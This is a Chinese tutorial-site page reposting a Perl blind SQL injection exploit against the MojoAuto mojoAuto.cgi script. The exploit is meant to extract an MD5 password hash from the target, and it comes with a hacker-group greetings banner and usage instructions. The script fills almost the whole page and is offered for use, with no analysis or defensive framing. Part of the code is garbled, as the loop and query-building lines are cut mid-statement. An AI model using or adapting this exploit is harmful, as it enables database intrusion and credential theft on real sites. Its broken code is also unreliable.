手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoAuto Blind SQL Injection Exploit #n";

print " # (mojoAuto.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat_a value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_a = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf"; if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit】相关文章:

Kaminsky DNS Cache Poisoning Flaw Exploit for Domains

命令行下的抗毒精英

IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)

IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

CoolPlayer m3u File Local Buffer Overflow Exploit

AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit

十种获取webshell的方法

腾讯手机管家通知栏关闭图文步骤

Maligno 一个开源的渗透测试工具

精品推荐
分类导航